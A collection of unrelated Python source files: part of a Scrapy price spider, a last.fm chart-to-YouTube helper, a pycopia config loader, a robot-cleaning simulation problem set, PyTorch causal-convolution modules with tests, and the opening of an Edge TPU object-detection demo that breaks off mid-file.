        else:
            products = hxs.select('//*[@id="area-2"]//tr[@class="prd first"]')
            for product in products:
                loader = ProductLoader(item=Product(), selector=product)
                loader.add_xpath('url', 'td/h3/a/@href')
                loader.add_xpath('name', 'td/h3/a/text()')
                # NOTE(review): if neither selector below matches, 'price' is
                # unbound (or stale from a previous iteration) when used —
                # possible UnboundLocalError; confirm against live markup.
                if product.select('td/p/strong/text()').extract():
                    price = product.select('td/p/strong/text()').extract()[0]
                else:
                    if product.select('td/div/p/strong/text()').extract():
                        price = product.select('td/div/p/strong/text()').extract()[0]
                loader.add_value('price', self._encode_price(price))
                yield loader.load_item()

    def _urljoin(self, response, url):
        """Helper to convert relative urls to absolute"""
        return urljoin_rfc(response.url, url, response.encoding)

    def _encode_price(self, price):
        # Normalize the decimal comma and drop non-ASCII (currency symbols).
        return price.replace(',','.').encode("ascii","ignore")
|
""" Contains functions to fetch API information from last.fm API."""
import logging
import youtube
import util.web
# Endpoint templates for the last.fm chart/search/listening-now services.
CHART_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/charts?nr={0}&type=track&format=json'
TAG_SEARCH_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/charts?nr={0}&type=track&f=tag:{1}&format=json'
LISTENING_NOW_URL = 'http://lastfm-ajax-vip1.phx1.cbsig.net/kerve/listeningnow?limit={0}&format=json'

# Module-level logger
log = logging.getLogger(__name__)
def chart(chart_items=5):
    """
    Finds the currently most played tunes on last.fm and turns them in to a youtube list of tracks.
    :param chart_items: int the amount of tracks we want.
    :return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
    """
    url = CHART_URL.format(chart_items)
    lastfm = util.web.http_get(url=url, json=True)
    # lazy %-args: formatting is deferred to the logging machinery
    log.debug('lastfm response %s', lastfm)
    if lastfm['json'] is not None:
        if 'results' in lastfm['json']:
            if 'track' in lastfm['json']['results']:
                # Bug fix: '!=' instead of 'is not' — identity comparison
                # with an int literal is unreliable and a SyntaxWarning
                # on Python 3.8+.
                if len(lastfm['json']['results']['track']) != 0:
                    # collect the matching youtube tracks
                    yt_tracks = []
                    for track in lastfm['json']['results']['track']:
                        search_str = '%s - %s' % (track['artist'], track['name'])
                        yt = youtube.search(search_str)
                        log.info(yt)
                        if yt is not None:
                            yt_tracks.append(yt)
                    return yt_tracks
    return None
def tag_search(search_str, by_id=True, max_tunes=40):
    """
    Search last.fm for tunes matching the search term and turns them in to a youtube list of tracks.
    :param search_str: str the search term to search for.
    :param by_id: bool if set to True, only tunes that have a youtube id will be added(recommended)
    :param max_tunes: int the max amount of tunes to return.
    :return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
    """
    url = TAG_SEARCH_URL.format(max_tunes, util.web.quote(search_str))
    lastfm = util.web.http_get(url=url, json=True)
    # lazy %-args: formatting is deferred to the logging machinery
    log.debug('lastfm response %s', lastfm)
    if lastfm['json'] is not None:
        # Guard against a missing 'results' key (consistent with chart();
        # previously this raised KeyError on such responses).
        if 'results' in lastfm['json'] and 'track' in lastfm['json']['results']:
            # Bug fix: '!=' instead of 'is not' identity comparison with a literal.
            if len(lastfm['json']['results']['track']) != 0:
                # collect the matching youtube tracks
                yt_tracks = []
                for track in lastfm['json']['results']['track']:
                    search_str = '%s - %s' % (track['artist'], track['name'])
                    if 'playlink' in track:
                        if 'data-youtube-id' in track['playlink']:
                            # the response already carries a youtube id
                            youtube_id = track['playlink']['data-youtube-id']
                            yt = youtube.video_details(youtube_id)
                            log.debug(yt)
                            if yt is not None:
                                yt_tracks.append(yt)
                        else:
                            # no id available: fall back to a text search
                            if not by_id:
                                yt = youtube.search(search_str)
                                log.debug('search by search string: %s result: %s' % (search_str, yt))
                                if yt is not None:
                                    yt_tracks.append(yt)
                    else:
                        if not by_id:
                            yt = youtube.search(search_str)
                            log.debug('search by search string: %s result: %s' % (search_str, yt))
                            if yt is not None:
                                yt_tracks.append(yt)
                return yt_tracks
    return None
def listening_now(max_tunes, by_id=True):
    """
    Gets a list of tunes other people using last.fm are listening to, and turns them in to a youtube list of tracks.
    :param max_tunes: int the amount of tracks we want.
    :param by_id: bool if set to True, only tunes that have a youtube id will be added(recommended)
    :return: list[ dict{'type=youtube', 'video_id', 'int(video_time)', 'video_title'} ] or None on error.
    """
    url = LISTENING_NOW_URL.format(max_tunes)
    lastfm = util.web.http_get(url=url, json=True)
    # lazy %-args: formatting is deferred to the logging machinery
    log.debug('lastfm response %s', lastfm)
    if lastfm['json'] is not None:
        # Guard against a missing 'Users' key (previously a KeyError);
        # '!=' instead of the 'is not' identity comparison with a literal.
        if 'Users' in lastfm['json'] and len(lastfm['json']['Users']) != 0:
            # collect the matching youtube tracks
            yt_tracks = []
            for user in lastfm['json']['Users']:
                if 'playlink' in user:
                    if 'data-youtube-id' in user['playlink']:
                        # the response already carries a youtube id
                        youtube_id = user['playlink']['data-youtube-id']
                        yt = youtube.video_details(youtube_id)
                        log.debug(yt)
                        if yt is not None:
                            yt_tracks.append(yt)
                else:
                    if 'Track' in user:
                        search_str = '%s - %s' % (user['Track']['Artist'], user['Track']['Name'])
                        if not by_id:
                            yt = youtube.search(search_str)
                            log.debug('search by search string: %s result: %s' % (search_str, yt))
                            if yt is not None:
                                yt_tracks.append(yt)
            return yt_tracks
    return None
|
#!/usr/bin/python3.4
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Basic configuration holder objects.
"""
import sys, os
import warnings
def execfile(fn, glbl, loc):
    """Python 3 replacement for the removed ``execfile()`` builtin.

    Executes the source in file *fn* with *glbl*/*loc* as the global and
    local namespaces.  The file is opened with a context manager so the
    handle is closed promptly (the original leaked the open file object).
    """
    with open(fn) as f:
        exec(f.read(), glbl, loc)
class BasicConfigError(Exception):
    """Base class for all configuration errors raised by this module."""
    pass
class ConfigLockError(BasicConfigError):
    """Raised when adding a new key to a locked ConfigHolder."""
    pass
class ConfigReadError(BasicConfigError):
    """Raised when a configuration file cannot be read successfully."""
    pass
class ConfigHolder(dict):
    """Holds named configuration information.

    For convenience, it maps attribute access to the real dictionary. This
    object is lockable, use the 'lock' and 'unlock' methods to set its state. If
    locked, new keys or attributes cannot be added, but existing ones may be
    changed.
    """
    def __init__(self, init={}, name=None):
        name = name or self.__class__.__name__.lower()
        dict.__init__(self, init)
        # Use dict.__setattr__ to bypass our own __setattr__, which writes keys.
        dict.__setattr__(self, "_locked", 0)
        dict.__setattr__(self, "_name", name)
    def __getstate__(self):
        # BUG FIX: return a concrete list -- a dict_items view is not picklable.
        return list(self.__dict__.items())
    def __setstate__(self, items):
        for key, val in items:
            self.__dict__[key] = val
    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, dict.__repr__(self))
    def __str__(self):
        n = self._name
        s = ["{}(name={!r}):".format(self.__class__.__name__, n)]
        s = s + ["    {}.{} = {!r}".format(n, it[0], it[1]) for it in self.items()]
        s.append("\n")
        return "\n".join(s)
    def __setitem__(self, key, value):
        # New keys may not be added while locked; existing ones stay writable.
        if self._locked and key not in self:
            raise ConfigLockError("setting attribute on locked config holder")
        return super(ConfigHolder, self).__setitem__(key, value)
    def __getitem__(self, name):
        return super(ConfigHolder, self).__getitem__(name)
    def __delitem__(self, name):
        return super(ConfigHolder, self).__delitem__(name)
    # Attribute access is an alias for item access.
    __getattr__ = __getitem__
    __setattr__ = __setitem__
    def lock(self):
        """Disallow adding new keys (existing keys remain writable)."""
        dict.__setattr__(self, "_locked", 1)
    def unlock(self):
        """Re-allow adding new keys."""
        dict.__setattr__(self, "_locked", 0)
    def islocked(self):
        return self._locked
    def copy(self):
        """Return a shallow copy that preserves the locked state."""
        ch = ConfigHolder(self)
        if self.islocked():
            ch.lock()
        return ch
    def add_section(self, name):
        """Add an empty sub-section stored under key *name*.

        BUG FIX: the original did ``self.name = Section(name)``, which (via
        the attribute->item mapping) always stored the section under the
        literal key "name" rather than the requested one.
        """
        self[name] = Section(name)
class Section(ConfigHolder):
    """A named sub-section of a configuration; behaves like a ConfigHolder."""
    def __init__(self, name):
        super(Section, self).__init__(name=name)
    def __repr__(self):
        # Deliberately uses the verbose multi-line __str__ form for repr output.
        return super(Section, self).__str__()
class BasicConfig(ConfigHolder):
    """A ConfigHolder that can populate itself from Python-syntax config files."""
    def mergefile(self, filename):
        """Merge in a Python syntax configuration file that should assign
        global variables that become keys in the configuration. Returns
        True if file read OK, False otherwise.
        """
        if not os.path.isfile(filename):
            return False
        gb = {} # Temporary global namespace for config files.
        gb["Section"] = Section
        gb["sys"] = sys # In case config stuff needs these.
        gb["os"] = os
        def include(fname):
            # Allow config files to pull in other config files by name.
            execfile(get_pathname(fname), gb, self)
        gb["include"] = include
        try:
            execfile(filename, gb, self)
        except Exception as err:
            # BUG FIX: narrowed from a bare ``except:`` so KeyboardInterrupt
            # and SystemExit propagate instead of being swallowed.
            warnings.warn(
                "BasicConfig: error reading {}: {} ({}).".format(
                    filename, type(err), err))
            return False
        else:
            return True
def get_pathname(basename):
    """Expand user/vars in *basename*; bare names resolve under /etc/pycopia."""
    expanded = os.path.expandvars(os.path.expanduser(basename))
    if os.sep not in expanded:
        expanded = os.path.join(os.sep, "etc", "pycopia", expanded)
    return expanded
# main function for getting a configuration file. gets it from the common
# configuration location (/etc/pycopia), but if a full path is given then
# use that instead.
def get_config(fname, **kwargs):
    """Load a configuration file into a BasicConfig and return it.

    The name is resolved via get_pathname (so bare names come from the
    common /etc/pycopia location).  Keyword arguments are visible to the
    config file and re-applied afterwards so they override its settings.
    Raises ConfigReadError when the file cannot be merged.
    """
    path = get_pathname(fname)
    conf = BasicConfig()
    conf.update(kwargs)  # kwargs available to config file.
    if not conf.mergefile(path):
        raise ConfigReadError("did not successfully read {!r}.".format(path))
    conf.update(kwargs)  # Again to override config settings.
    return conf
def check_config(fname):
    """check_config(filename) -> bool

    Check is a config file can be read without errors and contains
    something.
    """
    conf = BasicConfig()
    if not conf.mergefile(get_pathname(fname)):
        return False
    # A merge that produced no keys still counts as a failed check.
    return bool(conf)
def _test(argv):
    """Smoke test: load the sample config file and print its contents."""
    conf = get_config("config_test.conf")
    print(conf)
if __name__ == "__main__":
    _test(sys.argv)
|
# Problem Set 6: Simulating robots
# Name:
# Collaborators:
# Time:
import math
import random
import ps6_visualize
import pylab
# === Provided classes
class Position(object):
    """
    A Position represents a location in a two-dimensional room.
    """
    def __init__(self, x, y):
        """
        Initializes a position with coordinates (x, y).
        """
        self.x = x
        self.y = y
    def getX(self):
        return self.x
    def getY(self):
        return self.y
    def getNewPosition(self, angle, speed):
        """
        Computes and returns the new Position after a single clock-tick has
        passed, with this object as the current position, and with the
        specified angle and speed.
        Does NOT test whether the returned position fits inside the room.
        angle: float representing angle in degrees, 0 <= angle < 360
        speed: positive float representing speed
        Returns: a Position object representing the new position.
        """
        rad = math.radians(angle)
        # Angle is measured from the positive y-axis: cos drives y, sin drives x.
        return Position(self.x + speed * math.sin(rad),
                        self.y + speed * math.cos(rad))
# === Problems 1
class RectangularRoom(object):
    """
    A RectangularRoom represents a rectangular region containing clean or dirty
    tiles.
    A room has a width and a height and contains (width * height) tiles. At any
    particular time, each of these tiles is either clean or dirty.
    """
    def __init__(self, width, height):
        """
        Initializes a rectangular room with the specified width and height.
        Initially, no tiles in the room have been cleaned.
        width: an integer > 0
        height: an integer > 0
        """
        self.width = width
        self.height = height
        # BUG FIX: cleanTiles used to be a *class* attribute (a list shared by
        # every RectangularRoom instance), so tiles cleaned in one room leaked
        # into all others.  A per-instance set also makes entries unique
        # without the list(set(...)) round-trip on every clean.
        self.cleanTiles = set()
    def cleanTileAtPosition(self, pos):
        """
        Mark the tile under the position POS as cleaned.
        Assumes that POS represents a valid position inside this room.
        pos: a Position
        """
        x = pos.getX()
        y = pos.getY()
        # Nudge positions sitting exactly on (or past) a wall back inside.
        if y >= self.height:
            y -= 1
        elif y <= 0:
            y += 1
        if x >= self.width:
            x -= 1
        elif x <= 0:
            x += 1
        self.cleanTiles.add((math.floor(x), math.floor(y)))
    def isTileCleaned(self, m, n):
        """
        Return True if the tile (m, n) has been cleaned.
        Assumes that (m, n) represents a valid tile inside the room.
        m: an integer
        n: an integer
        returns: True if (m, n) is cleaned, False otherwise
        """
        return (math.floor(m), math.floor(n)) in self.cleanTiles
    def getNumTiles(self):
        """
        Return the total number of tiles in the room.
        returns: an integer
        """
        return self.width * self.height
    def getNumCleanedTiles(self):
        """
        Return the total number of clean tiles in the room.
        returns: an integer
        """
        return len(self.cleanTiles)
    def getRandomPosition(self):
        """
        Return a random position inside the room.
        returns: a Position object.
        """
        return Position(random.randrange(self.width), random.randrange(self.height))
    def isPositionInRoom(self, pos):
        """
        Return True if pos is inside the room.
        pos: a Position object.
        returns: True if pos is in the room, False otherwise.
        """
        return 0 <= pos.getX() <= self.width and 0 <= pos.getY() <= self.height
class Robot(object):
    """
    Represents a robot cleaning a particular room.

    At all times the robot has a particular position and direction in the room.
    The robot also has a fixed speed.

    Subclasses of Robot should provide movement strategies by implementing
    updatePositionAndClean(), which simulates a single time-step.
    """
    def __init__(self, room, speed):
        """
        Initializes a Robot with the given speed in the specified room. The
        robot initially has a random direction and a random position in the
        room. The robot cleans the tile it is on.

        room: a RectangularRoom object.
        speed: a float (speed > 0)
        """
        self.room = room
        self.speed = speed
        self.r_direction = random.randrange(360)
        self.r_position = room.getRandomPosition()
        room.cleanTileAtPosition(self.r_position)
    def getRobotPosition(self):
        """Return the robot's current Position object."""
        return self.r_position
    def getRobotDirection(self):
        """Return the robot's heading as an angle in degrees, 0 <= d < 360."""
        return self.r_direction
    def setRobotPosition(self, position):
        """Move the robot to *position* (a Position object)."""
        self.r_position = position
    def setRobotDirection(self, direction):
        """Point the robot at *direction* (an angle in degrees)."""
        self.r_direction = direction
    def updatePositionAndClean(self):
        """
        Simulate the passage of a single time-step; subclasses must override.
        """
        raise NotImplementedError
# === Problem 2
class StandardRobot(Robot):
    """
    A StandardRobot is a Robot with the standard movement strategy.
    At each time-step, a StandardRobot attempts to move in its current direction; when
    it hits a wall, it chooses a new direction randomly.
    """
    # def positioning(self, x, y, speed, angle):
    #
    def updatePositionAndClean(self):
        """
        Simulate the passage of a single time-step.
        Move the robot to a new position and mark the tile it is on as having
        been cleaned.
        """
        # has room and speed in attributes of robot
        # One "time-step" is simulated as self.speed/0.01 sub-steps: each
        # iteration moves from the tick's starting point by an ever-growing
        # distance `speed` (0.01, 0.02, ...) rather than accumulating moves.
        speed = 0.0
        speed_timer = 0.0
        robot_position = None
        while speed_timer < self.speed:
            # print('speed incr of UPC', speed)
            y = self.getRobotPosition().getY()
            x = self.getRobotPosition().getX()
            # NOTE(review): cleans self.r_position (the committed position),
            # not the intermediate sub-step position -- confirm this is intended.
            if self.room.isTileCleaned(int(x), int(y)) is False:
                self.room.cleanTileAtPosition(self.r_position)
            robot_position = Position(x, y)
            robot_position = robot_position.getNewPosition(self.r_direction, speed)
            # print('y', robot_position.getY())
            # print('x', robot_position.getX())
            speed += 0.01
            speed_timer += 0.01
            cy = robot_position.getY()
            cx = robot_position.getX()
            # Wall handling: clamp onto the wall, pick a fresh random heading,
            # and restart the growing step distance at 0.01.
            if cy <= 0:
                self.setRobotPosition(Position(robot_position.getX(),0))
                self.r_direction = random.randrange(360)
                speed = 0.01
            elif cy >= self.room.height:
                self.setRobotPosition(Position(robot_position.getX(), self.room.height))
                self.r_direction = random.randrange(360)
                speed = 0.01
            if cx <= 0:
                self.setRobotPosition(Position(0, robot_position.getY()))
                self.r_direction = random.randrange(360)
                speed = 0.01
            elif cx >= self.room.width:
                self.setRobotPosition(Position(self.room.width, robot_position.getY()))
                self.r_direction = random.randrange(360)
                speed = 0.01
            # print(type(robot_position))
        # Commit the final sub-step position (may overwrite a wall clamp above).
        self.setRobotPosition(robot_position)
# === Problem 3
def runSimulation(num_robots, speed, width, height, min_coverage, num_trials,
                  robot_type):
    """
    Runs NUM_TRIALS trials of the simulation and returns the mean number of
    time-steps needed to clean the fraction MIN_COVERAGE of the room.

    The simulation is run with NUM_ROBOTS robots of type ROBOT_TYPE, each with
    speed SPEED, in a room of dimensions WIDTH x HEIGHT.

    num_robots: an int (num_robots > 0)
    speed: a float (speed > 0)
    width: an int (width > 0)
    height: an int (height > 0)
    min_coverage: a float (0 <= min_coverage <= 1.0)
    num_trials: an int (num_trials > 0)
    robot_type: class of robot to be instantiated (e.g. Robot or
                RandomWalkRobot)
    """
    visualize = False
    total_time_steps = 0.0
    for trial in range(num_trials):
        if visualize:
            anim = ps6_visualize.RobotVisualization(num_robots, width, height)
        room = RectangularRoom(width, height)
        robots = [robot_type(room, speed) for _ in range(num_robots)]
        if visualize:
            anim.update(room, robots)
        # Keep stepping all robots until the coverage target is reached.
        while (room.getNumCleanedTiles() / float(room.getNumTiles())) < min_coverage:
            for bot in robots:
                bot.updatePositionAndClean()
                total_time_steps += 1
            if visualize:
                anim.update(room, robots)
        if visualize:
            anim.done()
        print(trial)
    return total_time_steps / num_trials
class RandomWalkRobot(Robot):
    """
    A RandomWalkRobot is a robot with the "random walk" movement strategy: it
    chooses a new direction at random after each time-step.
    """
    def updatePositionAndClean(self):
        """
        Simulate the passage of a single time-step: move one step along the
        current heading, clean the destination tile, and randomize the
        heading for the next step.
        """
        cur_pos = self.getRobotPosition()
        cur_dir = self.getRobotDirection()
        # Randomize the heading for the *next* tick; this move uses cur_dir.
        self.setRobotDirection(random.randrange(360))
        new_pos = cur_pos.getNewPosition(cur_dir, self.speed)
        # Only move (and clean) when the step stays inside the room;
        # otherwise stay put and retry next tick with the new heading.
        if self.room.isPositionInRoom(new_pos):
            self.setRobotPosition(new_pos)
            self.room.cleanTileAtPosition(new_pos)
    # NOTE: a large block of commented-out dead code (an abandoned sub-stepping
    # implementation duplicating StandardRobot) was removed here.
# === Problem 4
#
# 1) How long does it take to clean 80% of a 20x20 room with each of 1-10 robots?
#
# 2) How long does it take two robots to clean 80% of rooms with dimensions
# 20x20, 25x16, 40x10, 50x8, 80x5, and 100x4?
def showPlot1():
    """
    Produces a plot showing dependence of cleaning time on number of robots.
    """
    robot_counts = list(range(1, 11))
    mean_times = [runSimulation(n, 1.0, 20, 20, .8, 25, StandardRobot)
                  for n in robot_counts]
    pylab.title('Plot 1')
    pylab.xlabel('Number of Robots')
    pylab.ylabel('Mean Time')
    pylab.plot(robot_counts, mean_times)
    pylab.show()
# showPlot1()
def showPlot2(title, x_label, y_label):
    """
    Produces a plot showing dependence of cleaning time on room shape.

    title, x_label, y_label: strings used to annotate the plot.
    BUG FIX: these parameters were previously ignored in favour of
    hard-coded 'Plot 2' strings; they are now applied as callers intend.
    (A large commented-out earlier draft of this function was removed.)
    """
    num_r = 2
    room_sizes = [(20, 20), (25, 16), (40, 10), (50, 8), (80, 5), (100, 4)]
    mean_times = []
    aspect_ratios = []
    for width, height in room_sizes:
        mean_times.append(runSimulation(num_r, 1.0, width, height, 0.8, 100, StandardRobot))
        aspect_ratios.append(width / height)
    pylab.ylabel(y_label)
    pylab.xlabel(x_label)
    pylab.title(title)
    print(mean_times)
    pylab.plot(aspect_ratios, mean_times)
    pylab.show()
# === Problem 5
# print('result', runSimulation(1, 1.0, 10, 10, 0.9, 100, StandardRobot))
# === Problem 6
# For the parameters tested below (cleaning 80% of a 20x20 square room),
# RandomWalkRobots take approximately twice as long to clean the same room as
# StandardRobots do.
def showPlot3():
    """
    Produces a plot comparing the two robot strategies.
    """
    min_cov = 0.9
    num_bots = 1
    trials = 100
    room_sizes = [(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (10, 10)]
    speed = 1.0
    areas = [w * h for w, h in room_sizes]
    random_times = []
    standard_times = []
    for w, h in room_sizes:
        # Random walk first, then standard, for each room size.
        random_times.append(runSimulation(num_bots, speed, w, h, min_cov, trials, RandomWalkRobot))
        standard_times.append(runSimulation(num_bots, speed, w, h, min_cov, trials, StandardRobot))
    pylab.title('Random Walk vs. Standard Walk')
    pylab.xlabel('Area of Room')
    pylab.ylabel('Mean Time')
    pylab.plot(areas, standard_times, 'b^', label='standard')
    pylab.plot(areas, random_times, 'g--', label='random')
    pylab.legend()
    pylab.show()
# showPlot3()
if __name__ == "__main__":
    # Guard the long-running simulation so merely importing this module
    # (e.g. from a grader or another script) does not kick it off.
    showPlot2('Time to clean 80% of a 400-tile room for various room shapes',
              'Aspect Ratio',
              'Time / steps')
import torch
import torch.nn as nn
import torch.nn.functional as F
class CausalConv1d(nn.Conv1d):
    """1-D convolution that never looks at future timesteps.

    Causality is achieved by padding only on the left by
    (kernel_size - 1) * dilation.  The extra ``sigmoid``/``tanh`` keyword
    arguments are accepted but unused, mirroring the original interface.
    """
    def __init__(self,
                 input_size,
                 hidden_size,
                 kernel_size,
                 stride=1,
                 dilation=1,
                 groups=1,
                 bias=True,
                 sigmoid=None,
                 tanh=None):
        # Amount of left-only padding that keeps the convolution causal.
        self.left_padding = (kernel_size - 1) * dilation
        super(CausalConv1d, self).__init__(
            input_size,
            hidden_size,
            kernel_size,
            stride=stride,
            padding=0,
            dilation=dilation,
            groups=groups,
            bias=bias)
    def forward(self, input):
        # Incoming layout: (timesteps, batches, features).
        # Conv1d wants:    (batches, features, timesteps).
        padded = F.pad(input.permute(1, 2, 0), (self.left_padding, 0))
        convolved = super(CausalConv1d, self).forward(padded)
        # Restore (timesteps, batches, features) for the caller.
        return convolved.permute(2, 0, 1)
class Wave(nn.Module):
    """Stack of causal convolutions with exponentially growing dilation.

    The ``activation`` argument is accepted but currently unused, matching
    the original interface.
    """
    def __init__(self, input_size, hidden_size, layers=3, activation="tanh"):
        super(Wave, self).__init__()
        self.layers = []
        in_channels = input_size
        for idx in range(layers):
            # Dilation doubles per layer: 1, 2, 4, ...
            conv = CausalConv1d(in_channels, hidden_size, kernel_size=2, dilation=2 ** idx)
            self.layers.append(conv)
            self.add_module("layer" + str(idx), conv)
            in_channels = hidden_size
    def forward(self, data):
        out = data
        for conv in self.layers:
            out = conv(out)
        return out
class ShortWave(nn.Module):
    """Stack of causal convolutions with a fixed dilation of 1."""
    def __init__(self, input_size, hidden_size, layers=3):
        super(ShortWave, self).__init__()
        self.layers = []
        in_channels = input_size
        for idx in range(layers):
            conv = CausalConv1d(in_channels, hidden_size, kernel_size=2, dilation=1)
            self.layers.append(conv)
            self.add_module("layer" + str(idx), conv)
            in_channels = hidden_size
    def forward(self, data):
        out = data
        for conv in self.layers:
            out = conv(out)
        return out
def test_CausalConv1d(timesteps, input_size, hidden_size, batch_size, kernel_size, dilation, bias):
    """Exhaustively check CausalConv1d as an all-ones causal filter.

    Feeds one-hot impulses through a conv whose weights are all 1, and
    verifies each output equals bias plus 1 exactly at the timesteps whose
    receptive field covers the impulse, and that batches don't leak.

    BUG FIX: the target computation and failure message previously read the
    module-level loop globals ``k`` and ``d`` instead of the ``kernel_size``
    and ``dilation`` parameters, so the function only worked when called
    from the __main__ sweep below.
    """
    m = CausalConv1d(input_size, hidden_size, kernel_size=kernel_size, dilation=dilation, bias=bias != 0)
    m.weight.data.fill_(1)
    if bias:
        m.bias.data.fill_(bias)
    x = torch.autograd.Variable(torch.zeros(timesteps, batch_size, input_size), requires_grad=False)
    for batch in range(batch_size):
        for t in range(timesteps):
            for ci in range(input_size):
                x.data.fill_(0)
                x[t, batch, ci] = 1
                out = m(x)
                for b in range(batch_size):
                    for co in range(hidden_size):
                        if b == batch:
                            # The impulse at t is visible at t, t+dilation, ...
                            # for kernel_size taps.
                            target = [1 + bias if j in range(t, t + kernel_size * dilation, dilation) else bias
                                      for j in range(timesteps)]
                        else:
                            target = [bias for j in range(timesteps)]
                        if list(out[:, b, co].data) != target:
                            print("\nCausalConv1d wrong output for kernel_size", kernel_size,
                                  "and dilation", dilation, "i", input_size, "out", hidden_size,
                                  "batch_size", batch_size,
                                  "bias", bias)
                            print("input ", " ".join(str(int(el)) for el in x[:, b, co].data))
                            print("output", " ".join(str(el) for el in out[:, b, co].data))
                            print("target", " ".join(str(el) for el in target))
                        assert list(out[:, b, co].data) == target, "Test failed"
if __name__ == "__main__":
    import numpy as np
    timesteps, batch_size = 20, 3
    print("Running tests", end="")
    # Sweep small combinations of in/out channels, kernel size and dilation.
    # NOTE(review): test_CausalConv1d's target computation reads ``k`` and
    # ``d`` as globals, so these exact loop-variable names are load-bearing.
    for ci in range(1, 3):
        for co in range(1, 3):
            for k in range(1, 4):
                for d in range(1, 3):
                    print(".", end="", flush=True)
                    # Run each configuration once with a bias and once without.
                    test_CausalConv1d(timesteps, ci, co, batch_size, k, d, 0.5)
                    test_CausalConv1d(timesteps, ci, co, batch_size, k, d, 0)
    print("\nCausalConv1d tests passed")
|
<reponame>sundararajan20/edgetpuvision<filename>edgetpuvision/detect.py
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A demo which runs object detection on camera frames.
export TEST_DATA=/usr/lib/python3/dist-packages/edgetpu/test_data
Run face detection model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite
Run coco model:
python3 -m edgetpuvision.detect \
--model ${TEST_DATA}/mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
--labels ${TEST_DATA}/coco_labels.txt
"""
import argparse
import colorsys
import itertools
import time
from pycoral.adapters import detect
from pycoral.utils import edgetpu
import svg
import utils
from apps import run_app
import io
import numpy as np
import grpc
import inferencedata_pb2
import inferencedata_pb2_grpc
from PIL import Image
# gRPC channel and stub for remote inference; presumably initialized by the
# app wiring at runtime (left here as module-level globals) -- verify callers.
channel = None
stub = None
# Shared CSS for the SVG overlay: '.back' draws solid black label strips,
# '.bbox' draws transparent bounding boxes with a thin stroke.
CSS_STYLES = str(svg.CssStyle({'.back': svg.Style(fill='black',
                                                  stroke='black',
                                                  stroke_width='0.5em'),
                               '.bbox': svg.Style(fill_opacity=0.0,
                                                  stroke_width='0.1em')}))
def size_em(length):
    """Return a CSS width in em units roughly fitting *length* characters."""
    return '{}em'.format(0.6 * (length + 1))
def color(i, total):
    """Pick the i-th of *total* evenly spaced, fully saturated RGB colors."""
    r, g, b = colorsys.hsv_to_rgb(i / total, 1.0, 1.0)
    return tuple(int(255.0 * channel) for channel in (r, g, b))
def make_palette(keys):
    """Map each key to a distinct svg rgb() color string."""
    total = len(keys)
    return {key: svg.rgb(color(index, total)) for index, key in enumerate(keys)}
def make_get_color(color, labels):
    """Build a function mapping an object id to a display color.

    Priority: an explicit color override, then a per-label palette, then
    plain 'white' as the fallback.
    """
    if color:
        return lambda obj_id: color
    if labels:
        palette = make_palette(labels.keys())
        return palette.__getitem__
    return lambda obj_id: 'white'
def overlay(title, objs, get_color, labels, inference_time, inference_rate, layout):
    """Build the per-frame SVG overlay: boxes, captions, title and stats.

    title: headline string (skipped when falsy).
    objs: detections with .id, .score and .bbox in inference coordinates.
    get_color: callable mapping an object id to a color string.
    labels: dict of id -> label name, or None.
    inference_time: seconds spent on the last inference (must be non-zero).
    inference_rate: rolling fps figure shown in the info lines.
    layout: provides .window, .size and .inference_size for coordinate mapping.

    Returns the overlay serialized to an SVG document string.
    """
    x0, y0, width, height = layout.window
    font_size = 0.03 * height
    defs = svg.Defs()
    defs += CSS_STYLES
    doc = svg.Svg(width=width, height=height,
                  viewBox='%s %s %s %s' % layout.window,
                  font_size=font_size, font_family='monospace', font_weight=500)
    doc += defs
    for obj in objs:
        percent = int(100 * obj.score)
        if labels:
            caption = '%d%% %s' % (percent, labels[obj.id])
        else:
            caption = '%d%%' % percent
        color = get_color(obj.id)
        inference_width, inference_height = layout.inference_size
        # Scale the bbox from inference resolution to the rendered window size.
        bbox = obj.bbox.scale(1.0 / inference_width, 1.0 / inference_height).scale(*layout.size)
        x, y, w, h = bbox.xmin, bbox.ymin, bbox.width, bbox.height
        doc += svg.Rect(x=x, y=y, width=w, height=h,
                        style='stroke:%s' % color, _class='bbox')
        # Caption background strip sits just below the box, text drawn on top.
        doc += svg.Rect(x=x, y=y+h ,
                        width=size_em(len(caption)), height='1.2em', fill=color)
        t = svg.Text(x=x, y=y+h, fill='black')
        t += svg.TSpan(caption, dy='1em')
        doc += t
    ox = x0 + 20
    oy1, oy2 = y0 + 20 + font_size, y0 + height - 20
    # Title
    if title:
        doc += svg.Rect(x=0, y=0, width=size_em(len(title)), height='1em',
                        transform='translate(%s, %s) scale(1,-1)' % (ox, oy1), _class='back')
        doc += svg.Text(title, x=ox, y=oy1, fill='white')
    # Info
    lines = [
        'Objects: %d' % len(objs),
        'Inference time: %.2f ms (%.2f fps)' % (inference_time * 1000, 1.0 / inference_time)
    ]
    # Lines are stacked upward from the bottom edge of the window.
    for i, line in enumerate(reversed(lines)):
        y = oy2 - i * 1.7 * font_size
        doc += svg.Rect(x=0, y=0, width=size_em(len(line)), height='1em',
                        transform='translate(%s, %s) scale(1,-1)' % (ox, y), _class='back')
        doc += svg.Text(line, x=ox, y=y, fill='white')
    return str(doc)
def print_results(inference_rate, objs):
